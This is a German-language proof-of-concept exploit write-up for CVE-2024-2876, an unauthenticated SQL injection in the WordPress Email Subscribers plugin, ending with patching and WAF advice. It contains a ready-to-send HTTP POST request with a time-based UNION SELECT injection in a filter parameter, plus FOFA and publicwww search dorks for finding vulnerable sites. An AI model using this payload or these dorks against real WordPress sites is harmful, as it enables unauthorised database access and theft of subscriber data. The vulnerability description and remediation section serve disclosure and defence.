
Proof-of-Concept-Exploit für CVE-2024-2876, eine nicht authentifizierte SQL-Injection-Schwachstelle im Email Subscribers Plugin für WordPress, die die Extraktion sensibler Daten ermöglicht.
#Beschreibung der Schwachstelle:
Das Plugin „Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce“ für WordPress ist in allen Versionen bis einschließlich 5.7.14 anfällig für SQL-Injection über die run-Funktion der Klasse IG_ES_Subscribers_Query. Dies ist auf unzureichende Maskierung (Escaping) des benutzergesteuerten Parameters und fehlende ausreichende Vorbereitung der bestehenden SQL-Abfrage zurückzuführen. Nicht authentifizierte Angreifer können so zusätzliche SQL-Abfragen an bestehende Abfragen anhängen, um vertrauliche Informationen aus der Datenbank zu extrahieren.
#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"
#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE
#Wie beheben? Da alle Versionen bis einschließlich 5.7.14 von der CVE betroffen sind, wird Benutzern empfohlen, das Plugin „Email Subscribers by Icegram Express“ auf Version 5.7.15 (oder die neueste Version 5.7.19) zu aktualisieren. Patchstack-Benutzer haben die Möglichkeit, automatische Updates speziell für anfällige Plugins zu aktivieren. Implementieren Sie eine WAF/WAAP-Lösung als zusätzliche Schutzschicht. Der Vorteil solcher Lösungen besteht darin, dass selbst bei neuen und unbekannten Schwachstellen (0-Day) Angriffe durch Erkennung von Ausbeutungsmustern und -techniken verhindert werden können.